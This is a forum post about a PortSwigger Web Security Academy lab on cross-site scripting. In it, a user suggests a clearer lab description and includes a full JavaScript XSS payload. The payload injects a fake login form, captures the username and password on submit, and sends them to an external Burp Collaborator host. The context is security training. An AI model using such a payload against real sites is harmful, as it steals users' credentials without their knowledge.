Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: Exploiting cross-site scripting to capture passwords

slt | Last updated: Jul 16, 2024 02:29PM UTC

Hello! I think the description of what the simulated victim does should be updated on this lab. I used XSS to relace the current page content with the login form (after fetching it dynamically), then hook on the submit event to put the submission on hold while exfiltrating the credentials (assuming the simulated victim would try to login). It works as expected but would not solve the challenge. After looking at the solution, I'm quite disapointed! I feel my solution is way more subtle and nice ???? and should work with the simulated victim! Or at the very least, the description could be updated! Here is the payload I used: <script> fetch(location.href.toString().replace('/post?', '/login?')) .then(resp => resp.text()) .then(html => { const parser = new DOMParser(); let current_container = document.querySelector('div.container.is-page'); let doc = parser.parseFromString(html, 'text/html'); let doc_cont = doc.querySelector('div .container.is-page'); current_container.innerHTML = doc_cont.innerHTML; document.forms[0].addEventListener('submit', (evt) => { let form = document.forms[0]; evt.preventDefault(); let username = form.elements.username.value, password = form.elements.password.value; fetch("https://3hlexh2r5rea50zjl8l51ycksby2msah.oastify.com/?username=" + encodeURIComponent(username) + "&password=" + encodeURIComponent(password)) .then() .catch(() => { console.log("exfiltrated!"); document.forms[0].submit(); }); }); }) .catch(e => console.log(`ERROR: ${e}`)); </script> Thank you :-)

Ben, PortSwigger Agent | Last updated: Jul 17, 2024 09:48AM UTC